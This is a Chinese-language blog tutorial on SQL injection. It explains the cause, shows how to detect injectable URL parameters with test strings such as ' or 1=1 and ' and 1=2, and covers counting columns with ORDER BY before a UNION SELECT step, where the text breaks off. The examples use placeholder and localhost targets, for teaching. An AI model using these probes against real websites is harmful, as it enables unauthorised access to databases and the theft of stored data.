<!doctype html>
<html lang="zh-CN">
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <meta name="referrer" content="no-referrer-when-downgrade">
    

    <title>SQL注入  | matrix</title>
    <meta property="og:title" content="SQL注入  - matrix">
    <meta property="og:type" content="article">
        
    <meta property="article:published_time" content='2021-01-10T14:30:24&#43;08:00'>
        
        
    <meta property="article:modified_time" content='2021-01-10T14:30:24&#43;08:00'>
        
    <meta name="Keywords" content="黑客技术，WEB安全，让你听懂每个漏洞成因，明白每个技术原理,博客,项目管理,python,软件架构,公众号,小程序">
    <meta name="description" content="SQL注入 ">
        
    <meta name="author" content="matrix">
    <meta property="og:url" content="https://gitmatrix.gitee.io/post/OWASP-10/SQL-%E6%B3%A8%E5%85%A5/">
    <link rel="shortcut icon" href='/favicon.ico'  type="image/x-icon">

    <link rel="stylesheet" href='/css/normalize.css'>
    <link rel="stylesheet" href='/css/style.css'>
    <script type="text/javascript" src="//cdn.bootcdn.net/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

    
    
    
        <link href="https://cdn.bootcdn.net/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css" rel="stylesheet">
    
    
    
    
        <link rel="stylesheet" href='/css/douban.css'>
    
        <link rel="stylesheet" href='/css/other.css'>
    
</head>


<body>
    <header id="header" class="clearfix">
    <div class="container">
        <div class="col-group">
            <div class="site-name ">
                
                    <a id="logo" href="https://gitmatrix.gitee.io/">
                        matrix
                    </a>
                
                <p class="description">黑客技术，WEB安全，让你听懂每个漏洞成因，明白每个技术原理</p>
            </div>
            <div>
                <nav id="nav-menu" class="clearfix">
                    <a class="current" href="https://gitmatrix.gitee.io/">首页</a>
                    
                    <a  href="https://gitmatrix.gitee.io/archives/" title="归档">归档</a>
                    
                    <a  href="https://gitmatrix.gitee.io/about/" title="关于">关于</a>
                    
                </nav>
            </div>
        </div>
    </div>
</header>

    <div id="body">
        <div class="container">
            <div class="col-group">

                <div class="col-8" id="main">
                    
<div class="res-cons">
    <style type="text/css">
    .post-toc {
        position: fixed;
        width: 200px;
        margin-left: -210px;
        padding: 5px 10px;
        font-family: Athelas, STHeiti, Microsoft Yahei, serif;
        font-size: 12px;
        border: 1px solid rgba(0, 0, 0, .07);
        border-radius: 5px;
        background-color: rgba(255, 255, 255, 0.98);
        background-clip: padding-box;
        -webkit-box-shadow: 1px 1px 2px rgba(0, 0, 0, .125);
        box-shadow: 1px 1px 2px rgba(0, 0, 0, .125);
        word-wrap: break-word;
        white-space: nowrap;
        -webkit-box-sizing: border-box;
        box-sizing: border-box;
        z-index: 999;
        cursor: pointer;
        max-height: 70%;
        overflow-y: auto;
        overflow-x: hidden;
    }

    .post-toc .post-toc-title {
        width: 100%;
        margin: 0 auto;
        font-size: 20px;
        font-weight: 400;
        text-transform: uppercase;
        text-align: center;
    }

    .post-toc .post-toc-content {
        font-size: 15px;
    }

    .post-toc .post-toc-content>nav>ul {
        margin: 10px 0;
    }

    .post-toc .post-toc-content ul {
        padding-left: 20px;
        list-style: square;
        margin: 0.5em;
        line-height: 1.8em;
    }

    .post-toc .post-toc-content ul ul {
        padding-left: 15px;
        display: none;
    }

    @media print,
    screen and (max-width:1057px) {
        .post-toc {
            display: none;
        }
    }
</style>
<div class="post-toc" style="position: absolute; top: 188px;">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
        <nav id="TableOfContents">
  <ul>
    <li><a href="#1sql注入原理">1.SQL注入原理</a></li>
    <li><a href="#2注入过程">2.注入过程</a>
      <ul>
        <li><a href="#第一步sql注入点探测">第一步：SQL注入点探测</a></li>
        <li><a href="#第二步收集后台数据库信息">第二步：收集后台数据库信息</a></li>
        <li><a href="#第三步猜解用户名和密码">第三步：猜解用户名和密码</a></li>
        <li><a href="#4获取数据">4，获取数据</a></li>
      </ul>
    </li>
    <li><a href="#mysql-前置知识">mysql 前置知识</a>
      <ul>
        <li><a href="#information_schema-数据库">information_schema 数据库</a></li>
        <li><a href="#schemata-schemata-表中提供了当前数据中所有数据库的信息"><code>schemata</code>: SCHEMATA 表中提供了当前数据中所有<strong>数据库</strong>的信息；</a></li>
        <li><a href="#tablestables-表-提供了数据库中表的信息"><code>tables</code>:TABLES 表 提供了数据库中<strong>表的信息</strong></a></li>
        <li><a href="#columns-columns-表-提供了表中列的信息信息"><code>columns</code>: COLUMNS 表 提供了表中<strong>列的信息信息</strong></a></li>
        <li><a href="#mysql-常用内置函数">mysql 常用内置函数</a></li>
      </ul>
    </li>
  </ul>
</nav>
    </div>
</div>
<script type="text/javascript">
    $(document).ready(function () {
        var postToc = $(".post-toc");
        if (postToc.length) {
            var leftPos = $("#main").offset().left;
            if(leftPos<220){
                postToc.css({"width":leftPos-10,"margin-left":(0-leftPos)})
            }

            var t = postToc.offset().top - 20,
                a = {
                    start: {
                        position: "absolute",
                        top: t
                    },
                    process: {
                        position: "fixed",
                        top: 20
                    },
                };
            $(window).scroll(function () {
                var e = $(window).scrollTop();
                e < t ? postToc.css(a.start) : postToc.css(a.process)
            })
        }
    })
</script>
    <article class="post">
        <header>
            <h1 class="post-title">SQL注入 </h1>
        </header>
        <date class="post-meta meta-date">
            2021年1月10日
        </date>
        
        <div class="post-meta">
            <span>|</span>
            
            <span class="meta-category"><a href='/categories/Web-%E5%AE%89%E5%85%A8'>Web 安全</a></span>
            
            <span class="meta-category"><a href='/categories/%E5%8D%81%E5%A4%A7%E6%BC%8F%E6%B4%9E'>十大漏洞</a></span>
            
        </div>
        
        
        <div class="post-meta">
            <span id="busuanzi_container_page_pv">|<span id="busuanzi_value_page_pv"></span><span>
                    阅读</span></span>
        </div>
        
        
        <div class="clear" style="display: none">
            <div class="toc-article">
                <div class="toc-title">文章目录</div>
            </div>
        </div>
        
        <div class="post-content">
            <h1 id="sql注入">SQL注入</h1>
<h2 id="1sql注入原理">1.SQL注入原理</h2>
<blockquote>
<p>SQL注入即是指<a href="https://baike.baidu.com/item/web%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F/2498090">web应用程序</a>对<strong>用户输入数据的合法性没有判断或过滤不严</strong>，攻击者可以在web应用程序中<strong>事先定义好的查询语句的结尾上添加额外的<a href="https://baike.baidu.com/item/SQL%E8%AF%AD%E5%8F%A5/5714895">SQL语句</a></strong>，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器<strong>执行非授权的任意查询</strong>，从而进一步得到相应的数据信息。</p>
</blockquote>
<h2 id="2注入过程">2.注入过程</h2>
<h3 id="第一步sql注入点探测">第一步：SQL注入点探测</h3>
<blockquote>
<p>探测SQL注入点是关键的一步，通过适当的分析应用程序，可以判断什么地方存在SQL注入点。<strong>通常只要带有输入提交的动态网页，并且动态网页访问数据库，就可能存在SQL注入漏洞</strong></p>
<p>如果程序员信息安全意识不强，采用动态构造SQL语句访问数据库，并且对用户的输入未进行有效性验证，则存在SQL注入漏洞的可能性很大。<strong>一般通过页面的报错信息来确定是否存在SQL注入漏洞。</strong></p>
</blockquote>
<p>SQL语句中用户输入的数据无非就是两种：<strong>一种数字</strong>，<strong>一种字符</strong></p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">6
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">7
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">8
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- 数字型注入
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span>
<span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span>(<span style="color:#099">1</span>)
<span style="color:#998;font-style:italic">-- 字符型注入: (重点在于逃逸或者闭合引号)
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;1&#39;</span>
<span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;1&#34;</span>
<span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span>(<span style="color:#d14">&#39;1&#39;</span>)
<span style="color:#998;font-style:italic">-- sql 语句中的() 不代表实际含义，只作为一个分组处理，或者区分优先级
</span></code></pre></td></tr></table>
</div>
</div><h4 id="sql注入可能出现的位置">SQL注入可能出现的位置</h4>
<p>SQL 注入漏洞出现的位置**存在于用户可输入范围，**而用户可输入范围有以下三个地方：</p>
<ul>
<li><strong>URL 提交的参数（get 提交的数据）</strong></li>
<li><strong>HTTP 请求主体（post提交的数据）</strong></li>
<li><strong>HTTP 请求头 （User-Agent,Referer,Cookie）</strong></li>
</ul>
<blockquote>
<p>常用的SQL注入漏洞利用技术大致分为四类：</p>
<ul>
<li>联合注入 union</li>
<li>布尔注入</li>
<li>延时注入</li>
<li>报错注入</li>
</ul>
</blockquote>
<h4 id="1-url提交参数探测">1. URL提交参数探测</h4>
<blockquote>
<p>一般get提交数据存在SQL注入的形式如：http://xxx.xxx.xxx/abc.asp?id=XX</p>
<p>在其url后带有一个或多个参数，有时是整型参数，有时是字符串型参数，就可能存在SQL注入。如果没有进行必要的字符过滤，存在SQL注入的可能性就非常大。因此就可以构造参数来通过页面返回来进一步判断，</p>
</blockquote>
<h6 id="最常用内联注入方式">最常用内联注入方式</h6>
<table>
<thead>
<tr>
<th>测试字符</th>
<th>预期结果</th>
<th>变种</th>
</tr>
</thead>
<tbody>
<tr>
<td>'</td>
<td>触发数据库返回错误。</td>
<td>(通过添加字符闭合属性，注释，布尔等)</td>
</tr>
<tr>
<td>&lsquo;or 1=1</td>
<td>永真，返回所有行。</td>
<td>or 1=1  &ndash;+     &lsquo;) or 1=1 #</td>
</tr>
<tr>
<td>' and 1=2</td>
<td>永假，返回空。</td>
<td>' AND &lsquo;1&rsquo; = &lsquo;2       &lsquo;) AND (&lsquo;1&rsquo; = &lsquo;2    and 1=1</td>
</tr>
</tbody>
</table>
<blockquote>
<p>数字与字符串的区别有两点：① 数字不需要单引号（'）包围。② 数字能进行算术运算，字符串不能。</p>
</blockquote>
<p>参数为整数型的判断：</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- sql 语句为：
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span> ;
<span style="color:#998;font-style:italic">-- 提交连接为：
</span><span style="color:#998;font-style:italic"></span>http:<span style="color:#000;font-weight:bold">//</span>xxx.xxx.xxx<span style="color:#000;font-weight:bold">/</span>abc.asp<span style="color:#000;font-weight:bold">?</span>id<span style="color:#000;font-weight:bold">=</span>YY
</code></pre></td></tr></table>
</div>
</div><p>可以用以下步骤测试SQL注入是否存在:</p>
<ol>
<li>在URL链接中附加一个单引号，即</li>
</ol>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>xxx.xxx.xxx<span style="color:#000;font-weight:bold">/</span>abc.asp<span style="color:#000;font-weight:bold">?</span>id<span style="color:#000;font-weight:bold">=</span>YY<span style="color:#d14">&#39;
</span><span style="color:#d14">-- 提交后SQL语句变成了
</span><span style="color:#d14">select * from 表名 where id=YY’
</span></code></pre></td></tr></table>
</div>
</div><p>页面如果没做任何处理，通常会显示SQL语句的查询报错：</p>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210120183304386.png">
            <img class="mx-auto" alt="image-20210120183304386" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210120183304386.png" />
        </a>
    </p>
<ol start="2">
<li>在URL链接中进行and 或者or 运算比较，即</li>
</ol>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"> http:<span style="color:#000;font-weight:bold">//</span>xxx.xxx.xxx<span style="color:#000;font-weight:bold">/</span>abc.asp<span style="color:#000;font-weight:bold">?</span>id<span style="color:#000;font-weight:bold">=</span>YY <span style="color:#000;font-weight:bold">and</span> <span style="color:#099">1</span><span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span>
<span style="color:#998;font-style:italic">-- 提交后SQL语句变成了
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#a61717;background-color:#e3d2d2">表名</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span>YY <span style="color:#000;font-weight:bold">and</span> <span style="color:#099">1</span><span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span>;
</code></pre></td></tr></table>
</div>
</div><p>在通过页面返回数据数据比较，如 and 1=1 有数据返回，and 1=2 无数据返回，由此证明此处参数无任何参数过滤，有SQL注入</p>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210120195750365.png">
            <img class="mx-auto" alt="image-20210120195750365" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210120195750365.png" />
        </a>
    </p>
<p>如在登录场景中，SQL构造语句通常为：</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> username<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;lssi&#34;</span> <span style="color:#000;font-weight:bold">and</span> password<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;123456&#34;</span>;
</code></pre></td></tr></table>
</div>
</div><h3 id="第二步收集后台数据库信息">第二步：收集后台数据库信息</h3>
<blockquote>
<p><strong>不同数据库的注入方法、函数都不尽相同，因此在注入之前，我们先要判断一下数据库的类型。</strong></p>
<p>判断数据库类型的方法很多，可以输入特殊字符，如单引号，让程序返回错误信息，我们根据错误信息提示进行判断；还可以使用特定函数来判断</p>
</blockquote>
<p><strong>探测到注入点后需要进一步收集信息</strong></p>
<h4 id="1使用-order-by--查找列数">1.使用 order by  查找列数</h4>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>xxx.xxx.xxx<span style="color:#000;font-weight:bold">/</span>abc.asp<span style="color:#000;font-weight:bold">?</span>id<span style="color:#000;font-weight:bold">=</span>YY <span style="color:#000;font-weight:bold">order</span> <span style="color:#000;font-weight:bold">by</span> x

<span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">where</span> id<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span> <span style="color:#000;font-weight:bold">order</span> <span style="color:#000;font-weight:bold">by</span> <span style="color:#099">3</span>;
</code></pre></td></tr></table>
</div>
</div><p>当 order by 后面的参数进行增减，直到页面进行报错，从而找到列数,有多少列数就代表有多少数据表中有多少字段名，为后面的 union 连接查询做准备</p>
<blockquote>
<p><strong>order by是mysql中对查询数据进行排序的方法:</strong></p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#a61717;background-color:#e3d2d2">表名</span> <span style="color:#000;font-weight:bold">order</span> <span style="color:#000;font-weight:bold">by</span> <span style="color:#a61717;background-color:#e3d2d2">列名</span>(<span style="color:#a61717;background-color:#e3d2d2">或者数字</span>) <span style="color:#000;font-weight:bold">asc</span><span style="color:#a61717;background-color:#e3d2d2">；</span><span style="color:#998;font-style:italic">-- 升序(默认升序)
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#a61717;background-color:#e3d2d2">表名</span> <span style="color:#000;font-weight:bold">order</span> <span style="color:#000;font-weight:bold">by</span> <span style="color:#a61717;background-color:#e3d2d2">列名</span>(<span style="color:#a61717;background-color:#e3d2d2">或者数字</span>) <span style="color:#000;font-weight:bold">desc</span><span style="color:#a61717;background-color:#e3d2d2">；</span><span style="color:#998;font-style:italic">-- 降序
</span></code></pre></td></tr></table>
</div>
</div><blockquote>
<p><strong>这里的重点在于order by后既可以填列名或者是一个数字</strong></p>
</blockquote>
<p>举个例子： id是user表的第一列的列名，那么如果想根据id来排序，有两种写法</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">order</span> <span style="color:#000;font-weight:bold">by</span> id;
selecr <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">order</span> <span style="color:#000;font-weight:bold">by</span> <span style="color:#099">1</span>;
</code></pre></td></tr></table>
</div>
</div></blockquote>
<p>实例：</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">order</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">by</span><span style="color:#000;font-weight:bold">+</span><span style="color:#099">5</span> <span style="color:#998;font-style:italic">-- 加号代表空格
</span><span style="color:#998;font-style:italic"></span>http:<span style="color:#000;font-weight:bold">//</span>localhost:<span style="color:#099">81</span><span style="color:#000;font-weight:bold">/</span>mysql<span style="color:#000;font-weight:bold">/</span>test.php<span style="color:#000;font-weight:bold">?</span>name<span style="color:#000;font-weight:bold">=</span><span style="color:#099">1</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">order</span><span style="color:#000;font-weight:bold">+</span><span style="color:#000;font-weight:bold">by</span><span style="color:#000;font-weight:bold">+</span><span style="color:#099">6</span> 
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121093302929.png">
            <img class="mx-auto" alt="image-20210121093302929" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121093302929.png" />
        </a>
    </p>
<p>如图所示当 order by 5 时有数据显示，order by 6 页面无数据返回，则数据表的列数为5</p>
<h4 id="2通过-union-select-连接查询数据库关键信息">2.通过 <code>union select</code> 连接查询数据库关键信息</h4>
<blockquote>
<p><code>**需要注意在使用 union 查询的时候需要和主查询的列数相同**</code></p>
<p><strong>UNION 语句</strong>：用于将不同表中相同列中查询的数据展示出来；（不包括重复数据）</p>
<p><strong>UNION ALL 语句</strong>：用于将不同表中相同列中查询的数据展示出来；（包括重复数据）</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> <span style="color:#a61717;background-color:#e3d2d2">列名称</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#a61717;background-color:#e3d2d2">表名称</span> <span style="color:#000;font-weight:bold">union</span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#a61717;background-color:#e3d2d2">列名称</span> from表名称 <span style="color:#000;font-weight:bold">order</span> <span style="color:#000;font-weight:bold">by</span> <span style="color:#a61717;background-color:#e3d2d2">列名称；</span>
<span style="color:#000;font-weight:bold">SELECT</span> <span style="color:#a61717;background-color:#e3d2d2">列名称</span> <span style="color:#000;font-weight:bold">FROM</span> <span style="color:#a61717;background-color:#e3d2d2">表名称</span> <span style="color:#000;font-weight:bold">UNION</span> <span style="color:#000;font-weight:bold">ALL</span> <span style="color:#000;font-weight:bold">SELECT</span> <span style="color:#a61717;background-color:#e3d2d2">列名称</span> <span style="color:#000;font-weight:bold">FROM</span> <span style="color:#a61717;background-color:#e3d2d2">表名称</span> <span style="color:#000;font-weight:bold">ORDER</span> <span style="color:#000;font-weight:bold">BY</span> <span style="color:#a61717;background-color:#e3d2d2">列名称；</span>
</code></pre></td></tr></table>
</div>
</div></blockquote>
<p>通过 order by 知道列数后在根据 union select  使用条件占据列数，</p>
<p>如已知列数为5，则连接查询为 union selelct 1,2,3,4,5</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
